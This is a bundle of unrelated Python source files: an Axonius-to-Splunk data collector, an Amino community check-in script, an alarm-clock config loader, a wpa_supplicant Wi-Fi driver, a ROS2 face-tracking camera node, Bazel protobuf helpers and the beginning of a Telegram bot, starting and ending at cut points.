elif "SSLCertVerificationError" in str(ex) or "Could not find a suitable TLS CA certificate bundle" in str(ex):
raise ValueError("The Axonius host fails SSL verification, please review your SSL certificate validation settings")
else:
raise ValueError(f"Critical Error: {ex}")
pass
def collect_events(helper, ew):
checkpoint_name = f"checkpoint_{helper.get_arg('name')}_{helper.get_arg('entity_type')}_{helper.get_arg('saved_query')}"
# get Axonius configuration
opt_api_host = helper.get_arg('api_host')
opt_api_key = helper.get_arg('api_key')
opt_api_secret = helper.get_arg('api_secret')
# get selected saved query info
opt_entity_type = helper.get_arg('entity_type')
opt_saved_query = helper.get_arg('saved_query')
# get extra options
opt_page_size = helper.get_arg('page_size')
opt_shorten_field_names = helper.get_arg('shorten_field_names')
opt_incremental_data_ingest = helper.get_arg('incremental_data_ingest')
opt_standoff_ms = helper.get_arg('standoff_ms')
opt_field_mapping = helper.get_arg('dynamic_field_mapping')
opt_ssl_certificate_path = helper.get_arg('ssl_certificate_path')
opt_enforce_ssl_validation = helper.get_arg('enforce_ssl_validation')
helper.log_info(f"VARS - Axonius Host: {opt_page_size}")
helper.log_info(f"VARS - Entity type: {opt_entity_type}")
helper.log_info(f"VARS - Saved query: {opt_saved_query}")
helper.log_info(f"VARS - Page size: {opt_page_size}")
helper.log_info(f"VARS - Shorten field names: {opt_shorten_field_names}")
helper.log_info(f"VARS - Incremental data ingest: {opt_incremental_data_ingest}")
helper.log_info(f"VARS - API standoff (ms): {opt_standoff_ms}")
helper.log_info(f"VARS - Field Mapping: {opt_field_mapping}")
helper.log_info(f"VARS - Enforce SSL validation: {opt_enforce_ssl_validation}")
helper.log_info(f"VARS - CA bundle path: {opt_ssl_certificate_path}")
critical_error = False
def log_message(msg):
helper.log_info(msg)
# Set verify to True/False
verify = opt_enforce_ssl_validation
# Change the value of verify to the path of the ca_bundle if specified
if opt_ssl_certificate_path:
if len(opt_ssl_certificate_path) > 0:
verify = opt_ssl_certificate_path
# The host field will be used to set the source host in search
host = None
# Pull out just the host information from the Host
match = re.match("(?:https?:\/\/)([0-9A-z-.]+)(?::\d+)?", opt_api_host)
# Only set host if the regex exists, match should never be None.
if match is not None:
host=match.groups()[0]
timeout = Config.request_timeout if helper.get_arg('name') is not None else 5
# Create an API object for REST calls
api = API(opt_api_host, opt_api_key, opt_api_secret, verify, timeout=timeout)
# Create EntitySearch object with entity type and page size
search = EntitySearch(api, opt_entity_type, opt_page_size, log_message)
# Load the input's checkpoint data
checkpoint = helper.get_check_point(checkpoint_name)
if checkpoint is not None:
helper.log_info(f"VARS - Check point: {checkpoint_name}")
# Default dynamic field names to an empty dict in case opt_field_mapping is empty
dynamic_field_names = {}
# Use dynamic mapping if specified
if opt_field_mapping is not None:
if len(opt_field_mapping) > 0:
try:
dynamic_field_names = json.loads(opt_field_mapping)
except Exception as ex:
pass
# Retry variables
exceeded_max_retries = False
exception_thrown = False
max_retries = len(Config.retry_standoff) - 1
entity_count = 0
retries = 0
# Set the fetch_time field name, take into account the use of shorten field name
fetch_time_field_name = "fetch_time" if True == opt_shorten_field_names else "specific_data.data.fetch_time"
event_writer = None
while retries < max_retries and not True == critical_error:
try:
metadata = Metadata(api)
version = metadata.get_version()
            # Pull out just the version number, stripping any release-candidate suffix
            match = re.match(r"(\d+_\d+_\d+)(?:_RC\d+)?", version)
            # Only rewrite the version if the regex matched
if match is not None:
version = match.groups()[0].replace("_", ".")
helper.log_info(f"STATS - Version: {version}")
tup_version = tuple(map(int, (version.split("."))))
tup_supported_version = tuple(map(int, (Config.supported_minimum_version.split("."))))
if tup_version < tup_supported_version:
raise Exception("UnsupportedVersion")
# Get definition of query_fields, used to check if the fetch_time field should be removed
api_endpoint = f"/api/{opt_entity_type}"
ax_saved_queries = SavedQueries(api, api_endpoint)
uuid, query_filter, query_fields = ax_saved_queries.get_attributes_by_name(opt_saved_query)
retries = 0
# Default remove fetch time to true
remove_fetch_time_field = True
# Look for fetch_time in the query_fields definition of the specified saved query
if True == opt_shorten_field_names:
if fetch_time_field_name in query_fields:
remove_fetch_time_field = False
# Create EventWriter instance to process batches
if event_writer is None:
event_writer = EventWriter(incremental_data_ingest=opt_incremental_data_ingest, remove_fetch_time_field=remove_fetch_time_field, checkpoint=checkpoint, host=host, source=opt_saved_query, index=helper.get_output_index(), sourcetype=helper.get_sourcetype(), helper=helper, event_writer=ew)
# Grab entity from the saved search
search.execute_saved_query(opt_saved_query, int(opt_standoff_ms)/1000, opt_shorten_field_names, dynamic_field_names, incremental_ingest=opt_incremental_data_ingest, batch_callback=event_writer.process_batch)
# Get Stats
entity_count = event_writer.get_entity_count()
events_written = event_writer.get_events_written()
# Log stats
helper.log_info(f"STATS - Total entities returned: {entity_count}")
helper.log_info(f"STATS - Total events written: {events_written}")
except Exception as ex:
if "UnsupportedVersion" in str(ex):
critical_error = True
else:
helper.log_error(f"ERR - Error '{ex}', attempting to recover")
exception_thrown = True
if True == critical_error:
helper.log_critical(f"Input '{helper.get_arg('name')}' Critical Error: Axonius version {version} is unsupported, the minimum version is {Config.supported_minimum_version}")
elif True == exception_thrown:
# Increment retry counter
if True == exception_thrown:
# Log retry
if retries > 0 and False == exceeded_max_retries:
helper.log_info(f"COLL - Retry: {retries}")
retries += 1
if retries < max_retries:
# Log length of retry sleep time
helper.log_info(f"COLL - Sleeping for {Config.retry_standoff[retries]} seconds, then retrying")
# Sleep the process and then retry
time.sleep(Config.retry_standoff[retries])
else:
exceeded_max_retries = True
# Log no devices after max retries
helper.log_critical(f"Input '{helper.get_arg('name')}' Critical Error: No entities returned afetr max retries ({max_retries}), check the saved query '{opt_saved_query}' in the Axonius web console to validate entity count.")
else:
            # Save a new checkpoint if at least one entity was returned
            if entity_count > 0:
                helper.save_check_point(checkpoint_name, datetime.datetime.now().timestamp())
            # Successful run with no critical error: leave the retry loop
            break
|
#!/usr/bin/env python3
import amino
import os
import getpass
os.system('clear')
print( '\033[1;31m /$$ /$$ ')
print( '\033[1;31m | $$ | $$ ')
print( '\033[1;31m /$$$$$$$| $$$$$$$ /$$$$$$ /$$$$$$$| $$ /$$')
print( '\033[1;31m /$$_____/| $$__ $$ /$$__ $$ /$$_____/| $$ /$$/')
print( '\033[1;31m| $$ | $$ \ $$| $$$$$$$$| $$ | $$$$$$/ ')
print( '\033[1;31m| $$ | $$ | $$| $$_____/| $$ | $$_ $$ ')
print( '\033[1;31m| $$$$$$$| $$ | $$| $$$$$$$| $$$$$$$| $$ \ $$')
print( '\033[1;31m \_______/|__/ |__/ \_______/ \_______/|__/ \__/')
print( '\033[1;31m /$$ ')
print( '\033[1;31m |__/ ')
print( '\033[92m /$$ /$$$$$$$ ')
print( '\033[92m /$$$$$$| $$| $$__ $$')
print( '\033[92m|______/| $$| $$ \ $$')
print( '\033[92m | $$| $$ | $$')
print( '\033[92m | $$| $$ | $$')
print( '\033[92m |__/|__/ |__/ \033[1;36mscript By \033[1;92mkira_xc')
print('\n\033[0m')
client=amino.Client()
ss=0
sz=25
nuum=0
tst=False
while tst==False:
try:
email=input("\033[1;93m# your email : \033[0m")
password=getpass.getpass("\033[1;93m# your password : \033[0m")
client.login(email=email,password=password)
tst=True
except:
tst=False
print("\033[1;93m# verify email or password\033[0m")
exx=input("\033[1;93m# to be continue ?\033[1;92m y/n \033[0m: \033[0m")
if exx=='n' or exx=='N' or exx=='no':
os._exit(1)
listcom=client.sub_clients(start=ss,size=sz)
print("\033[1;93m# comminuty lengh : ",len(listcom.comId))
while len(listcom.comId)!=0:
for comId in listcom.comId:
sub_client=amino.SubClient(comId=comId,profile=client.profile)
try:
sub_client.check_in('0')
info=sub_client.get_community_info(comId=comId)
nuum=nuum+1
            print(nuum,"\033[1;93m)\033[1;92mcheck in : ok \ncommunity name :",info.name,"\ncommunity id : ",comId,"\033[0m")
except:
ttff=True
ss=ss+25
listcom=client.sub_clients(start=ss,size=sz)
print ("\033[1;92mall comminuty is done !\n\033[0m")
os._exit(1)
|
# coding=utf-8
'''
Global data. Handles reading and validating the configuration.
Missing configuration entries are given default values, with a warning that pauses.
'''
import os.path as spath
import shutil
import logging
from . import mylogging
from sine.utils import EventManager
from .__meta__ import VERSION as version
clocks = []
data = {}
config = {}
timeFormats = []
dateFormats = []
eManager = EventManager(mylogging.getLogger(mylogging.rootPath + '.eManager'))
title = u'闹钟 v' + version
def _init():
import sys
from sine.utils.properties import load, loadSingle, LineReader
from sine.utils import Path
from .initUtil import warn
def boolConverter(s):
        '''Treat an empty string or a string starting with '0' as False; anything else as True.'''
if s == '' or s.startswith('0'):
return False
return True
    # Get the directory containing the code files (it holds the default configuration files, etc.)
location = Path(__file__).join('..')
data['location'] = location
    # Read the configuration ---------------
conf_filename = 'clock.properties'
allMiss = False
try:
useDefault(location, conf_filename)
with open(conf_filename, 'r', encoding='latin') as file:
config.update(load(file))
except Exception as e:
warn(u'从 %s 文件加载配置失败,将会使用默认配置。' % (conf_filename), e)
allMiss = True
    # Guess whether the encoding is utf8 or gbk (by comparing decode failure counts), then decode
utf8_error = 0
for k, v in config.items():
v = v.encode('latin')
try:
v.decode('utf8')
except Exception as e:
utf8_error += 1
gbk_error = 0
for k, v in config.items():
v = v.encode('latin')
try:
v.decode('gbk')
except Exception as e:
gbk_error += 1
    # Prefer guessing utf8
if utf8_error <= gbk_error:
encoding = 'utf8'
else:
encoding = 'gbk'
if utf8_error > 0 and gbk_error > 0:
warn(u'无法用UTF-8或GBK解码配置文件 %s ,配置的值会部分丢失且可能有异常。' % (conf_filename))
    # Decode
for k, v in config.items():
try:
config[k] = v.encode('latin').decode(encoding)
except Exception as e:
pass
    # Fill in defaults for missing settings (key, default value, converter)
default_config = [
('warning_pause', True, boolConverter),
('sound', True, boolConverter),
('show_msg', True, boolConverter),
('taskbar_flash', True, boolConverter),
('screen_flash_mode', '0111101111', None),
('alarm_last', 30, int),
('alarm_interval', 300, int),
('default_remindAhead', 60, int),
('default_sound', 'default', None),
('format', '%Y-%m-%d %H:%M:%S %%warn %%3idx %%3state %%msg', None),
('flash_format', '%Y-%m-%d %H:%M:%S %%msg', None),
('warn', '!!!', None),
('state.ON', 'ON', None),
('state.OFF', 'OFF', None),
('datafile', 'clocks.csv', None),
('logfile', 'clock.log', None),
('log_format', '%(asctime)s - %(name)s - %(levelname)s - %(message)s', None),
('encoding', 'utf-8', None),
('debug', False, boolConverter),
('debug.no_clear_screen', False, boolConverter),
]
if allMiss:
for (key, default, converter) in default_config:
config[key] = default
else:
for (key, default, converter) in default_config:
if key not in config:
warn(u'找不到设置\'%s\',将会使用默认值\'%s\'。' % (key, str(default)))
config[key] = default
elif converter:
try:
config[key] = converter(config[key])
except Exception as e:
warn(u'读取\'%s=%s\'异常,将会使用默认值\'%s\'。' % (key, str(config[key]), str(default)), e)
config[key] = default
    # Load or apply runtime state from the configured defaults
data['sound'] = config['sound']
data['show_msg'] = config['show_msg']
mylogging.setDebug(config['debug'])
logger = mylogging.getRoot()
formatter = logging.Formatter(config['log_format'])
handler = logging.FileHandler(config['logfile'])
handler.setLevel(logging.DEBUG)
handler.setFormatter(formatter)
logger.addHandler(handler)
    # Read the date and time parsing format configuration --------------
format_filename = 'time.properties'
try:
useDefault(location, format_filename)
formats = []
with open(format_filename, 'r', encoding='latin') as file:
for line in LineReader(file):
key, value = loadSingle(line)
formats.append((key, value.split(',')))
except Exception as e:
warn(u'从 %s 文件读取时间识别格式出错,将会使用默认格式。' % (format_filename), e)
formats = [( '%M' , ['minute', 'second', 'microsecond']),
('%H:' ,['hour', 'minute', 'second', 'microsecond']),
('%H.' ,['hour', 'minute', 'second', 'microsecond']),
( ':%S', ['second', 'microsecond']),
( '.%S', ['second', 'microsecond']),
('%H:%M' ,['hour', 'minute', 'second', 'microsecond']),
('%H.%M' ,['hour', 'minute', 'second', 'microsecond']),
( ':%M:%S', ['minute', 'second', 'microsecond']),
( '.%M.%S', ['minute', 'second', 'microsecond']),
('%H:%M:%S',['hour', 'minute', 'second', 'microsecond']),
('%H.%M.%S',['hour', 'minute', 'second', 'microsecond'])]
timeFormats.extend(formats)
format_filename = 'date.properties'
try:
useDefault(location, format_filename)
formats = []
with open(format_filename, 'r', encoding='latin') as file:
for line in LineReader(file):
key, value = loadSingle(line)
formats.append((key, value.split(',')))
except Exception as e:
warn(u'从 %s 文件读取日期识别格式出错,将会使用默认格式。' % (format_filename), e)
formats = [( '/%d', ['day']),
( '%m/%d', ['month', 'day']),
('%y/%m/%d',['year', 'month', 'day'])]
dateFormats.extend(formats)
def useDefault(location, filename):
    '''When the configuration file `filename` does not exist, copy the default file from `location`.'''
suffix = '.default'
filepath = filename
if not spath.isfile(filepath):
defaultpath = location.join(filename + suffix)
if spath.isfile(defaultpath):
shutil.copyfile(defaultpath, filepath)
_init()
|
import re
from time import sleep
from wireless.wireless import WirelessDriver, cmd
class WPASupplicantWireless(WirelessDriver):
_file = "/tmp/wpa_supplicant.conf"
_interface = None
# init
def __init__(self, interface=None):
self.interface(interface)
# connect to a network
def connect(self, ssid, password):
# attempt to stop any active wpa_supplicant instances
# ideally we do this just for the interface we care about
cmd("sudo killall wpa_supplicant")
# don't do DHCP for GoPros; can cause dropouts with the server
cmd("sudo ifconfig {} 10.5.5.10/24 up".format(self._interface))
# create configuration file
f = open(self._file, "w")
f.write('network={{\n ssid="{}"\n psk="{}"\n}}\n'.format(ssid, password))
f.close()
# attempt to connect
cmd("sudo wpa_supplicant -i{} -c{} -B".format(self._interface, self._file))
# check that the connection was successful
# i've never seen it take more than 3 seconds for the link to establish
sleep(5)
if self.current() != ssid:
return False
# attempt to grab an IP
# better hope we are connected because the timeout here is really long
# cmd('sudo dhclient {}'.format(self._interface))
# parse response
return True
# returned the ssid of the current network
def current(self):
# get interface status
response = cmd("iwconfig {}".format(self.interface()))
# the current network is on the first line.
# ex: wlan0 IEEE 802.11AC ESSID:"SSID" Nickname:"<WIFI@REALTEK>"
line = response.splitlines()[0]
match = re.search('ESSID:"(.+?)"', line)
if match is not None:
network = match.group(1)
if network != "off/any":
return network
# return none if there was not an active connection
return None
# return a list of wireless adapters
def interfaces(self):
# grab list of interfaces
response = cmd("iwconfig")
# parse response
interfaces = []
for line in response.splitlines():
if len(line) > 0 and not line.startswith(" "):
# this line contains an interface name!
if "no wireless extensions" not in line:
# this is a wireless interface
interfaces.append(line.split()[0])
# return list
return interfaces
# return the current wireless adapter
def interface(self, interface=None):
if interface is not None:
self._interface = interface
else:
return self._interface
# enable/disable wireless networking
def power(self, power=None):
# not supported yet
return None
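# Minimal usage sketch (the interface name, SSID and password are placeholders):
def _example_connect():
    wifi = WPASupplicantWireless(interface="wlan0")
    if wifi.connect("GP12345678", "goprohero"):
        print("connected to", wifi.current())
    else:
        print("connection failed; wireless interfaces:", wifi.interfaces())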
|
# Copyright 2018 Robert Adams
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import queue
import threading
import time
import sys
import rclpy
from rclpy.node import Node
from rclpy.parameter import Parameter
from std_msgs.msg import Int32MultiArray
from std_msgs.msg import MultiArrayDimension
from ros2_adafruit_pwmhat_msgs.msg import PWMPinAngle, PWMAngle
class ROS2_facelook_node(Node):
def __init__(self):
super().__init__('ros2_facelook_node', namespace='raspicam')
self.set_parameter_defaults( [
('bounding_box_topic', Parameter.Type.STRING, 'found_faces'),
('pwm_topic', Parameter.Type.STRING, '/pwmhatter/angle'),
('angle_step', Parameter.Type.DOUBLE, 1.0),
('delta_magnification', Parameter.Type.DOUBLE, 10.0),
('max_angle', Parameter.Type.DOUBLE, 80.0),
] )
self.initialize_pwm_publisher()
self.initialize_processing_queue()
self.initialize_bounding_box_subscriber()
def destroy_node(self):
# overlay Node function called when class is being stopped and camera needs closing
super().destroy_node()
def initialize_bounding_box_subscriber(self):
# Setup subscription for incoming bounding box info
self.receiver = self.create_subscription(Int32MultiArray,
self.get_parameter_value('bounding_box_topic'),
self.receive_bounding_box)
def initialize_processing_queue(self):
# Create a queue and a thread that processes messages in the queue
self.queue_lock = threading.Lock()
self.bbox_queue = queue.Queue()
# self.bbox_queue = queue.SimpleQueue() # introduced in Python 3.7
# thread to read images placed in the queue and process them
self.processor_event = threading.Event()
self.processor = threading.Thread(target=self.process_bounding_boxes, name='bounding box')
self.processor.start()
def initialize_pwm_publisher(self):
# initialize 'known' angle so first request will be sure to go out
self.pan_angle = 10000
self.tilt_angle = 10000
self.pwmmer = PWMmer(self,
self.get_parameter_value('pwm_topic'),
-self.get_parameter_value('max_angle'),
self.get_parameter_value('max_angle'),
self.get_logger())
self.send_pwm_commands(self.pan_angle, self.tilt_angle)
def stop_workers(self):
# if workers are initialized and running, tell them to stop and wait until stopped
if hasattr(self, 'processor_event') and self.processor_event != None:
self.processor_event.set()
if hasattr(self, 'processor') and self.processor.is_alive():
self.processor.join()
def receive_bounding_box(self, msg):
if type(msg) != type(None) and hasattr(msg, 'data'):
self.get_logger().debug('FLooker: receive_bbox. dataLen=%s' % (len(msg.data)))
self.bbox_queue.put(msg)
else:
self.get_logger().error('FLooker: receive_bbox. no data attribute')
def process_bounding_boxes(self):
# Take bounding boxes from the queue and send angle commands to the camera
# Initialize camera position
self.get_logger().debug('FLooker: Initializing camera to 0,0')
self.send_pwm_commands(0, 0)
# Loop for each bounding box info and update the camera movement
while True:
if self.processor_event.is_set():
break
try:
msg = self.bbox_queue.get(block=True, timeout=2)
except queue.Empty:
msg = None
if self.processor_event.is_set():
break
if type(msg) != type(None):
# Bounding boxes come in a two dimensional array:
# Row 0 => ( 0, 0, imageAreaWidth, imageAreaHeight)
# Row n => ( bb_right, bb_top, bb_width, bb_height )
bboxes = AccessInt32MultiArray(msg)
width = bboxes.get(0, 2)
widthhalf = width / 2
height = bboxes.get(0, 3)
heighthalf = height / 2
self.get_logger().debug('FLooker: process_bounding_boxes. image=%s/%s' % (width, height) )
                # loop over all bounding boxes and compute the average center
wcenter = 0
wheight = 0
hcenter = 0
hwidth = 0
for ii in range(1, bboxes.rows):
wcenter = wcenter + ((bboxes.get(ii, 2) - bboxes.get(ii, 0)) / 2) + bboxes.get(ii,0)
wheight = wheight + bboxes.get(ii,3)
hcenter = hcenter + ((bboxes.get(ii, 3) - bboxes.get(ii, 1)) / 2) + bboxes.get(ii,1)
hwidth = hwidth + bboxes.get(ii,2)
waverage = wcenter / ( bboxes.rows - 1) # average horizontal center of all boxes
wheight = wheight / ( bboxes.rows - 1) # average height of all boxes
haverage = hcenter / ( bboxes.rows - 1) # average vertical center of all boxes
hwidth = hwidth / ( bboxes.rows - 1) # average width of all boxes
self.get_logger().debug('FLooker: process_bounding_boxes. averageCenter=%s/%s, averageSize=%s/%s'
% (waverage, haverage, hwidth, wheight) )
# positive deltas mean above the middle and negative deltas mean below the middle
wdelta = (width / 2) - waverage
hdelta = (height / 2) - haverage
self.get_logger().debug('FLooker: process_bounding_boxes. deltas=%s/%s'
% (wdelta, hdelta) )
if (wdelta <= -widthhalf
or wdelta >= widthhalf
or hdelta <= -heighthalf
or hdelta >= heighthalf):
self.get_logger().error('FLooker: deltas wrong! dim=%s/%s, avg=%s/%s, delta=%s/%s'
% ( width, height, waverage, haverage, wdelta, hdelta) )
else:
target_pan_angle = (self.pan_angle
+ (self.get_parameter_value('angle_step')
* self.sign(wdelta)
* abs(wdelta) / self.get_parameter_value('delta_magnification')
)
)
target_tilt_angle = (self.tilt_angle
- (self.get_parameter_value('angle_step')
* self.sign(hdelta)
* abs(hdelta) / self.get_parameter_value('delta_magnification')
)
)
self.send_pwm_commands(target_pan_angle, target_tilt_angle)
def send_pwm_commands(self, target_pan_angle, target_tilt_angle):
# Send command to PWM channels if the desired angle has changed.
# Note: uses and updates self.pan_angle and self.tilt_angle.
if target_pan_angle != self.pan_angle:
if self.pwmmer.setPWM('pan', target_pan_angle):
self.get_logger().debug('FLooker: sending chan=%s, angle=%s' % ('pan', target_pan_angle))
self.pan_angle = target_pan_angle
else:
self.get_logger().error('FLooker: target pan angle failed! targets=%s/%s'
% (target_pan_angle, target_tilt_angle) )
if target_tilt_angle != self.tilt_angle:
if self.pwmmer.setPWM('tilt', target_tilt_angle):
self.get_logger().debug('FLooker: sending chan=%s, angle=%s' % ('tilt', target_tilt_angle))
self.tilt_angle = target_tilt_angle
else:
self.get_logger().error('FLooker: target tilt angle failed! targets=%s/%s'
% (target_pan_angle, target_tilt_angle) )
def get_parameter_or(self, param, default):
# Helper function to return value of a parameter or a default if not set
ret = None
param_desc = self.get_parameter(param)
if param_desc.type_== Parameter.Type.NOT_SET:
ret = default
else:
ret = param_desc.value
return ret
def get_parameter_value(self, param):
# Helper function to return value of a parameter
ret = None
param_desc = self.get_parameter(param)
if param_desc.type_== Parameter.Type.NOT_SET:
raise Exception('Fetch of parameter that does not exist: ' + param)
else:
ret = param_desc.value
return ret
def set_parameter_defaults(self, params):
# If a parameter has not been set externally, set the value to a default.
# Passed a list of "(parameterName, parameterType, defaultValue)" tuples.
parameters_to_set = []
for (pparam, ptype, pdefault) in params:
if not self.has_parameter(pparam):
parameters_to_set.append( Parameter(pparam, ptype, pdefault) )
if len(parameters_to_set) > 0:
self.set_parameters(parameters_to_set)
def has_parameter(self, param):
# Return 'True' if a parameter by that name is specified
param_desc = self.get_parameter(param)
if param_desc.type_== Parameter.Type.NOT_SET:
return False
return True
def sign(self, val):
# Helper function that returns the sign of the passed value (1 or -1).
# Defined here so we don't have to require numpy.
return 1 if val >= 0 else -1
class PWMmer:
# Small class to hold current state of PWM channel
def __init__(self, node, topic, minVal, maxVal, logger=None):
self.node = node
self.topic = topic
self.minVal = minVal
self.maxVal = maxVal
self.logger = logger
self.channels = {}
self.logger.debug('PWMmer: init: topic=%s, min=%s, max=%s' %
(topic, str(minVal), str(maxVal)))
self.publisher = self.node.create_publisher(PWMAngle, topic)
def setPWM(self, channel, angle):
# Send the message to set the given PWM channel
ret = True
if not channel in self.channels:
self.channels[channel] = self.minVal - 1000
if angle != self.channels[channel]:
if angle >= self.maxVal or angle <= self.minVal:
self.logger.error('PWMmer: angle out of range. channel=%s, angle=%s'
% (channel, angle) )
ret = False
else:
msg = PWMAngle()
msg.chan = str(channel)
msg.angle = float(angle)
msg.angle_units = PWMAngle.DEGREES
self.publisher.publish(msg)
self.channels[channel] = angle
ret = True
return ret
class AccessInt32MultiArray:
# Wrap a multi-access array with functions for 2D access
def __init__(self, arr):
self.arr = arr
self.columns = self.ma_get_size_from_label('width')
self.rows = self.ma_get_size_from_label('height')
def rows(self):
# return the number of rows in the multi-array
return self.rows
def get(self, row, col):
        # return the entry at row 'row' and column 'col'
return self.arr.data[col + ( row * self.columns)]
def ma_get_size_from_label(self, label):
# Return dimension size for passed label (usually 'width' or 'height')
for mad in self.arr.layout.dim:
if mad.label == label:
return int(mad.size)
return 0
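# Illustrative sketch of the message layout this wrapper expects (values are placeholders):
# a flat Int32MultiArray whose 'height' and 'width' layout dimensions give the row and column
# counts, with row 0 holding (0, 0, image_width, image_height) and each later row holding one
# bounding box as described in process_bounding_boxes above.
def _example_bbox_message():
    msg = Int32MultiArray()
    msg.layout.dim.append(MultiArrayDimension(label='height', size=2, stride=8))
    msg.layout.dim.append(MultiArrayDimension(label='width', size=4, stride=4))
    msg.data = [0, 0, 640, 480,
                100, 120, 80, 80]
    return AccessInt32MultiArray(msg)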
class CodeTimer:
# A little helper class for timing blocks of code
def __init__(self, logger, name=None):
self.logger = logger
self.name = " '" + name + "'" if name else ''
def __enter__(self):
        self.start = time.perf_counter()
def __exit__(self, exc_type, exc_value, traceback):
        self.took = (time.perf_counter() - self.start) * 1000.0
self.logger('Code block' + self.name + ' took: ' + str(self.took) + ' ms')
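# Minimal usage sketch: any callable that accepts a string works as the logger.
def _example_code_timer():
    with CodeTimer(print, name='sleepy block'):
        time.sleep(0.01)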
def main(args=None):
rclpy.init(args=args)
ffNode = ROS2_facelook_node()
try:
rclpy.spin(ffNode)
except KeyboardInterrupt:
ffNode.get_logger().info('FLooker: Keyboard interrupt')
ffNode.stop_workers()
ffNode.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
|
"""Utility functions for generating protobuf code."""
_PROTO_EXTENSION = ".proto"
def well_known_proto_libs():
return [
"@com_google_protobuf//:any_proto",
"@com_google_protobuf//:api_proto",
"@com_google_protobuf//:compiler_plugin_proto",
"@com_google_protobuf//:descriptor_proto",
"@com_google_protobuf//:duration_proto",
"@com_google_protobuf//:empty_proto",
"@com_google_protobuf//:field_mask_proto",
"@com_google_protobuf//:source_context_proto",
"@com_google_protobuf//:struct_proto",
"@com_google_protobuf//:timestamp_proto",
"@com_google_protobuf//:type_proto",
"@com_google_protobuf//:wrappers_proto",
]
def get_proto_root(workspace_root):
"""Gets the root protobuf directory.
Args:
workspace_root: context.label.workspace_root
Returns:
The directory relative to which generated include paths should be.
"""
if workspace_root:
return "/{}".format(workspace_root)
else:
return ""
def _strip_proto_extension(proto_filename):
if not proto_filename.endswith(_PROTO_EXTENSION):
fail('"{}" does not end with "{}"'.format(
proto_filename,
_PROTO_EXTENSION,
))
return proto_filename[:-len(_PROTO_EXTENSION)]
def proto_path_to_generated_filename(proto_path, fmt_str):
"""Calculates the name of a generated file for a protobuf path.
For example, "examples/protos/helloworld.proto" might map to
"helloworld.pb.h".
Args:
proto_path: The path to the .proto file.
fmt_str: A format string used to calculate the generated filename. For
example, "{}.pb.h" might be used to calculate a C++ header filename.
Returns:
The generated filename.
"""
return fmt_str.format(_strip_proto_extension(proto_path))
def _get_include_directory(include):
directory = include.path
prefix_len = 0
virtual_imports = "/_virtual_imports/"
if not include.is_source and virtual_imports in include.path:
root, relative = include.path.split(virtual_imports, 2)
result = root + virtual_imports + relative.split("/", 1)[0]
return result
if not include.is_source and directory.startswith(include.root.path):
prefix_len = len(include.root.path) + 1
if directory.startswith("external", prefix_len):
external_separator = directory.find("/", prefix_len)
repository_separator = directory.find("/", external_separator + 1)
return directory[:repository_separator]
else:
return include.root.path if include.root.path else "."
def get_include_protoc_args(includes):
"""Returns protoc args that imports protos relative to their import root.
Args:
includes: A list of included proto files.
Returns:
A list of arguments to be passed to protoc. For example, ["--proto_path=."].
"""
return [
"--proto_path={}".format(_get_include_directory(include))
for include in includes
]
def get_plugin_args(plugin, flags, dir_out, generate_mocks):
"""Returns arguments configuring protoc to use a plugin for a language.
Args:
plugin: An executable file to run as the protoc plugin.
flags: The plugin flags to be passed to protoc.
dir_out: The output directory for the plugin.
generate_mocks: A bool indicating whether to generate mocks.
Returns:
A list of protoc arguments configuring the plugin.
"""
augmented_flags = list(flags)
if generate_mocks:
augmented_flags.append("generate_mock_code=true")
return [
"--plugin=protoc-gen-PLUGIN=" + plugin.path,
"--PLUGIN_out=" + ",".join(augmented_flags) + ":" + dir_out,
]
def _get_staged_proto_file(context, source_file):
if source_file.dirname == context.label.package:
return source_file
else:
copied_proto = context.actions.declare_file(source_file.basename)
context.actions.run_shell(
inputs = [source_file],
outputs = [copied_proto],
command = "cp {} {}".format(source_file.path, copied_proto.path),
mnemonic = "CopySourceProto",
)
return copied_proto
def protos_from_context(context):
"""Copies proto files to the appropriate location.
Args:
context: The ctx object for the rule.
Returns:
A list of the protos.
"""
protos = []
for src in context.attr.deps:
for file in src[ProtoInfo].direct_sources:
protos.append(_get_staged_proto_file(context, file))
return protos
def includes_from_deps(deps):
"""Get includes from rule dependencies."""
return [
file
for src in deps
for file in src[ProtoInfo].transitive_imports.to_list()
]
def get_proto_arguments(protos, genfiles_dir_path):
"""Get the protoc arguments specifying which protos to compile."""
arguments = []
for proto in protos:
massaged_path = proto.path
if massaged_path.startswith(genfiles_dir_path):
massaged_path = proto.path[len(genfiles_dir_path) + 1:]
arguments.append(massaged_path)
return arguments
def declare_out_files(protos, context, generated_file_format):
"""Declares and returns the files to be generated."""
return [
context.actions.declare_file(
proto_path_to_generated_filename(
proto.basename,
generated_file_format,
),
)
for proto in protos
]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Basic bot framework forked from Andrés Ignacio Torres <andresitorresm@gmail.com>,
all other files by Al Matty <al@almatty.com>.
"""
import time, os
import random
import logging
from telegram.ext import CommandHandler, Filters, MessageHandler, Updater
class MerchBot:
"""
A class to encapsulate all relevant methods of the bot.
"""
def __init__(self):
"""
Constructor of the class. Initializes certain instance variables
and checks if everything's O.K. for the bot to work as expected.
"""
# This environment variable should be set before using the bot
        self.token = os.environ.get('STATS_BOT_TOKEN')
# These will be checked against as substrings within each
# message, so different variations are not required if their
        # stem is present (e.g. "all" covers "/all" and "ball")
self.menu_trigger = ['/all', '/stats']
self.loan_stats_trigger = ['/loans']
self.il_trigger = ['/IL']
self.assets_trigger = ['/assets']
# Stops runtime if the token has not been set
if self.token is None:
raise RuntimeError(
"FATAL: No token was found. " + \
"You might need to specify one or more environment variables.")
# Configures logging in debug level to check for errors
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
level=logging.INFO)
def run_bot(self):
"""
Sets up the required bot handlers and starts the polling
thread in order to successfully reply to messages.
"""
# Instantiates the bot updater
self.updater = Updater(self.token, use_context=True)
self.dispatcher = self.updater.dispatcher
# Declares and adds a handler for text messages that will reply with
# content if a user message includes a trigger word
text_handler = MessageHandler(Filters.text, self.handle_text_messages)
self.dispatcher.add_handler(text_handler)
# Fires up the polling thread. We're live!
self.updater.start_polling()
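        # Note: start_polling() returns immediately and polling runs on a
        # background thread. For a graceful shutdown on SIGINT, a blocking
        # call such as the following is commonly added (suggestion only, not
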